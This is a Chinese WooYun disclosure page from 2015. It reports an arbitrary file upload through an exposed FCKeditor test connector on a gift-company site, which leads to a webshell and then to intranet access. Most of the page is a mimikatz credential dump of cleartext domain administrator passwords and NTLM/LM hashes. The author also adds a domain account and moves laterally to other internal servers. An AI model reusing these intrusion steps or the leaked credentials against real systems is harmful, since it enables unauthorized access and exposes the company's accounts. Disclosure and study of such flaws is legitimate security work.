当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142643

漏洞标题:手礼网某站任意上传导致getshell(成功漫游内网)

相关厂商:shouliwang.com

漏洞作者: mango

提交时间:2015-09-21 23:02

修复时间:2015-11-06 11:06

公开时间:2015-11-06 11:06

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-21: 细节已通知厂商并且等待厂商处理中
2015-09-22: 厂商已经确认,细节仅向厂商公开
2015-10-02: 细节向核心白帽子及相关领域专家公开
2015-10-12: 细节向普通白帽子公开
2015-10-22: 细节向实习白帽子公开
2015-11-06: 细节向公众公开

简要描述:

~~ ~~~几个月过去了 我来看看你们的安全

详细说明:

http://admin.giftport.com.cn/fckeditor/editor/filemanager/browser/default/connectors/test.html fckeditor编辑器问题 任意上传文件

N7BSJ5LG}P}}G%`OCERYRRQ.png


SZQ)%$T]R)K(@P`(ZDD@108.png


拿到shell 发现很早就有人拿到shell

]5Q]1P9NZXZ)H1W_9LX0@T9.png


往下翻发现一些铭感数据

XQE$R5`IA)S{738I6LMJF72.png


还有某邮箱账户

34669}2]]I0NW5_PLD5ASB1.png


貌似不用了

漏洞证明:

因为这台服务器死活无法提权成功 只好从别的下手 找到sa密码然后连接 进行提权
192.168.5.96
mango1 密码 qwe!@#123

UCN$YC@Q5H1]_0DN%AK8Q(4.png


开启代理 连接sa提权的服务器

IMG_1651.JPG


成功上服务器
然后抓取服务器密码

Using 'mimikatz.log' for logfile : OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 74 ; 1605863264 (0000004a:5fb78760)
Session : RemoteInteractive from 1
User Name : administrator
Domain : GPDB
Logon Server : ANP_BK
Logon Time : 11/27/2014 3:52:59 PM
SID : S-1-5-21-484940898-303005728-826582926-500
msv :
[00000002] Primary
* Username : Administrator
* Domain : GPDB
* LM : 4147b5822bc9e43ba4f35a970d67b820
* NTLM : 83cca0e36e3d75795ee3e21743ed8579
* SHA1 : 32ff18d48dcc112fe7328d0da3986bd1f7d0386c
wdigest :
* Username : Administrator
* Domain : GPDB
* Password : Hong0212slwxdb
kerberos :
* Username : administrator
* Domain : GPDB.ORG
* Password : (null)
ssp :
[00000000]
* Username : administrator
* Domain : ANP_AP2
* Password : WxSl!anport
credman :
[00000000]
* Username : ANP_AP2\administrator
* Domain : 192.168.5.82
* Password : zzxwzlgq!26
[00000001]
* Username : ANP_AP1\administrator
* Domain : 192.168.5.81
* Password : zzxwzlgq!26
Authentication Id : 0 ; 2206333688 (00000000:8381faf8)
Session : Interactive from 0
User Name : Administrator
Domain : GPDB
Logon Server : ANP_BK
Logon Time : 1/4/2012 4:01:34 PM
SID : S-1-5-21-484940898-303005728-826582926-500
msv :
[00000002] Primary
* Username : Administrator
* Domain : GPDB
* LM : 4147b5822bc9e43ba4f35a970d67b820
* NTLM : 83cca0e36e3d75795ee3e21743ed8579
* SHA1 : 32ff18d48dcc112fe7328d0da3986bd1f7d0386c
wdigest :
* Username : Administrator
* Domain : GPDB
* Password : Hong0212slwxdb
kerberos :
* Username : Administrator
* Domain : GPDB.ORG
* Password : (null)
ssp :
[00000000]
* Username : administrator
* Domain : ANP_AP2
* Password : WxSl!anport
[00000001]
* Username : administrator
* Domain : ANP_AP1
* Password : WxSl!anport
credman :
[00000000]
* Username : ANP_AP2\administrator
* Domain : 192.168.5.82
* Password : zzxwzlgq!26
[00000001]
* Username : ANP_AP1\administrator
* Domain : 192.168.5.81
* Password : zzxwzlgq!26
Authentication Id : 96 ; 2810703969 (00000060:a787f061)
Session : NetworkCleartext from 0
User Name : IUSR_ANP_BK
Domain : GPDB
Logon Server : ANP_BK
Logon Time : 9/21/2015 3:54:10 AM
SID : S-1-5-21-484940898-303005728-826582926-1610
msv :
[00000002] Primary
* Username : IUSR_ANP_BK
* Domain : GPDB
* LM : a607db9a3e0c40edd3ef3ccbc804f895
* NTLM : d3f1ddb1aa8a8448e569a47249dc1ab6
* SHA1 : 81ab16f613eda01bdc07ef1c66a7d4aad4a6bd8a
wdigest :
* Username : IUSR_ANP_BK
* Domain : GPDB
* Password : W84:,(QU#862r2
kerberos :
* Username : IUSR_ANP_BK
* Domain : GPDB.ORG
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 63747 (00000000:0000f903)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 12/24/2011 1:51:48 PM
SID :
msv :
[00000002] Primary
* Username : ANP_BK$
* Domain : GPDB
* NTLM : 7abd26de291214877bdcdb997b8fddff
* SHA1 : 27231c7820b00f08d197d5414d48951042b2a078
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 1334317644 (00000000:4f88124c)
Session : RemoteInteractive from 1
User Name : Administrator
Domain : GPDB
Logon Server : ANP_BK
Logon Time : 12/31/2011 12:34:10 PM
SID : S-1-5-21-484940898-303005728-826582926-500
msv :
[00000002] Primary
* Username : Administrator
* Domain : GPDB
* LM : 4147b5822bc9e43ba4f35a970d67b820
* NTLM : 83cca0e36e3d75795ee3e21743ed8579
* SHA1 : 32ff18d48dcc112fe7328d0da3986bd1f7d0386c
wdigest :
* Username : Administrator
* Domain : GPDB
* Password : Hong0212slwxdb
kerberos :
* Username : Administrator
* Domain : GPDB.ORG
* Password : Hong0212slwxdb
ssp :
credman :
[00000000]
* Username : ANP_AP2\administrator
* Domain : 192.168.5.82
* Password : zzxwzlgq!26
[00000001]
* Username : ANP_AP1\administrator
* Domain : 192.168.5.81
* Password : zzxwzlgq!26
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : NETWORK SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 12/24/2011 1:51:49 PM
SID : S-1-5-20
msv :
[00000002] Primary
* Username : ANP_BK$
* Domain : GPDB
* NTLM : 7abd26de291214877bdcdb997b8fddff
* SHA1 : 27231c7820b00f08d197d5414d48951042b2a078
wdigest :
* Username : (null)
* Domain : (null)
* Password : 47 dc d4 ce 08 2e 8c 1a 3e 36 9a c0 d1 e3 c4 79 ba ff e7 31 25 53 46 03 16 2d 44 7b
kerberos :
* Username : anp_bk$
* Domain : GPDB.ORG
* Password : (null)
ssp :
credman :
Authentication Id : 96 ; 3028880533 (00000060:b4890c95)
Session : RemoteInteractive from 4
User Name : mango1
Domain : GPDB
Logon Server : ANP_BK
Logon Time : 9/21/2015 7:12:54 PM
SID : S-1-5-21-484940898-303005728-826582926-1641
msv :
[00000002] Primary
* Username : mango1
* Domain : GPDB
* LM : 487b7dc1471b2a78b75e0c8d76954a50
* NTLM : 2de5cd0f15d1c070851d1044e1d95c90
* SHA1 : 134fb9c7133a65718b2ab44498d788b8afc1b0f4
wdigest :
* Username : mango1
* Domain : GPDB
* Password : qwe!@#123
kerberos :
* Username : mango1
* Domain : GPDB.ORG
* Password : (null)
ssp :
credman :
Authentication Id : 96 ; 3027384365 (00000060:b472382d)
Session : NetworkCleartext from 0
User Name : IUSR_ANP_BK
Domain : GPDB
Logon Server : ANP_BK
Logon Time : 9/21/2015 7:04:04 PM
SID : S-1-5-21-484940898-303005728-826582926-1610
msv :
[00000002] Primary
* Username : IUSR_ANP_BK
* Domain : GPDB
* LM : a607db9a3e0c40edd3ef3ccbc804f895
* NTLM : d3f1ddb1aa8a8448e569a47249dc1ab6
* SHA1 : 81ab16f613eda01bdc07ef1c66a7d4aad4a6bd8a
wdigest :
* Username : IUSR_ANP_BK
* Domain : GPDB
* Password : W84:,(QU#862r2
kerberos :
* Username : IUSR_ANP_BK
* Domain : GPDB.ORG
* Password : (null)
ssp :
credman :
Authentication Id : 96 ; 2897153493 (00000060:acaf0dd5)
Session : NetworkCleartext from 0
User Name : IUSR_ANP_BK
Domain : GPDB
Logon Server : ANP_BK
Logon Time : 9/21/2015 9:07:04 AM
SID : S-1-5-21-484940898-303005728-826582926-1610
msv :
[00000002] Primary
* Username : IUSR_ANP_BK
* Domain : GPDB
* LM : a607db9a3e0c40edd3ef3ccbc804f895
* NTLM : d3f1ddb1aa8a8448e569a47249dc1ab6
* SHA1 : 81ab16f613eda01bdc07ef1c66a7d4aad4a6bd8a
wdigest :
* Username : IUSR_ANP_BK
* Domain : GPDB
* Password : W84:,(QU#862r2
kerberos :
* Username : IUSR_ANP_BK
* Domain : GPDB.ORG
* Password : (null)
ssp :
credman :
Authentication Id : 96 ; 2893792061 (00000060:ac7bc33d)
Session : NetworkCleartext from 0
User Name : IUSR_ANP_BK
Domain : GPDB
Logon Server : ANP_BK
Logon Time : 9/21/2015 8:55:31 AM
SID : S-1-5-21-484940898-303005728-826582926-1610
msv :
[00000002] Primary
* Username : IUSR_ANP_BK
* Domain : GPDB
* LM : a607db9a3e0c40edd3ef3ccbc804f895
* NTLM : d3f1ddb1aa8a8448e569a47249dc1ab6
* SHA1 : 81ab16f613eda01bdc07ef1c66a7d4aad4a6bd8a
wdigest :
* Username : IUSR_ANP_BK
* Domain : GPDB
* Password : W84:,(QU#862r2
kerberos :
* Username : IUSR_ANP_BK
* Domain : GPDB.ORG
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 12/24/2011 1:51:52 PM
SID : S-1-5-19
msv :
wdigest :
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 69 ; 2669405182 (00000045:9f1be3fe)
Session : RemoteInteractive from 1
User Name : administrator
Domain : GPDB
Logon Server : ANP_BK
Logon Time : 9/29/2014 9:48:07 AM
SID : S-1-5-21-484940898-303005728-826582926-500
msv :
[00000002] Primary
* Username : Administrator
* Domain : GPDB
* LM : 4147b5822bc9e43ba4f35a970d67b820
* NTLM : 83cca0e36e3d75795ee3e21743ed8579
* SHA1 : 32ff18d48dcc112fe7328d0da3986bd1f7d0386c
wdigest :
* Username : Administrator
* Domain : GPDB
* Password : Hong0212slwxdb
kerberos :
* Username : administrator
* Domain : GPDB.ORG
* Password : Hong0212slwxdb
ssp :
credman :
[00000000]
* Username : ANP_AP2\administrator
* Domain : 192.168.5.82
* Password : zzxwzlgq!26
[00000001]
* Username : ANP_AP1\administrator
* Domain : 192.168.5.81
* Password : zzxwzlgq!26
Authentication Id : 96 ; 3021367799 (00000060:b41669f7)
Session : RemoteInteractive from 6
User Name : mango1
Domain : GPDB
Logon Server : ANP_BK
Logon Time : 9/21/2015 6:29:28 PM
SID : S-1-5-21-484940898-303005728-826582926-1641
msv :
[00000002] Primary
* Username : mango1
* Domain : GPDB
* LM : 487b7dc1471b2a78b75e0c8d76954a50
* NTLM : 2de5cd0f15d1c070851d1044e1d95c90
* SHA1 : 134fb9c7133a65718b2ab44498d788b8afc1b0f4
wdigest :
* Username : mango1
* Domain : GPDB
* Password : qwe!@#123
kerberos :
* Username : mango1
* Domain : GPDB.ORG
* Password : (null)
ssp :
credman :
Authentication Id : 96 ; 1375163407 (00000060:51f7540f)
Session : NetworkCleartext from 0
User Name : IUSR_ANP_BK
Domain : GPDB
Logon Server : ANP_BK
Logon Time : 9/16/2015 4:46:46 AM
SID : S-1-5-21-484940898-303005728-826582926-1610
msv :
[00000002] Primary
* Username : IUSR_ANP_BK
* Domain : GPDB
* LM : a607db9a3e0c40edd3ef3ccbc804f895
* NTLM : d3f1ddb1aa8a8448e569a47249dc1ab6
* SHA1 : 81ab16f613eda01bdc07ef1c66a7d4aad4a6bd8a
wdigest :
* Username : IUSR_ANP_BK
* Domain : GPDB
* Password : W84:,(QU#862r2
kerberos :
* Username : IUSR_ANP_BK
* Domain : GPDB.ORG
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : ANP_BK$
Domain : GPDB
Logon Server : (null)
Logon Time : 12/24/2011 1:51:48 PM
SID : S-1-5-18
msv :
wdigest :
* Username : ANP_BK$
* Domain : GPDB
* Password : 47 dc d4 ce 08 2e 8c 1a 3e 36 9a c0 d1 e3 c4 79 ba ff e7 31 25 53 46 03 16 2d 44 7b
kerberos :
* Username : anp_bk$
* Domain : GPDB.ORG
* Password : (null)
ssp :
credman :
mimikatz #


尝试是否为通用密码 然而 并不是
但是 通过观察我发现!我添加的帐号mango1 尽然是域账号!!!!!
那么 所有域服务器都可以登录陆!!!
192.168.5.64
然后登录上去发现~~原来是之前shell的那个站点呀 bbs也在上面呢~~~

IMG_1653.JPG


IMG_1654.JPG


ILD7}BT)Z29XVU4YMT9V]Y3.png


修复方案:

~~~加强服务器管理~

版权声明:转载请注明来源 mango@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-09-22 11:05

厂商回复:

已修复

最新状态:

暂无


漏洞评价:

评论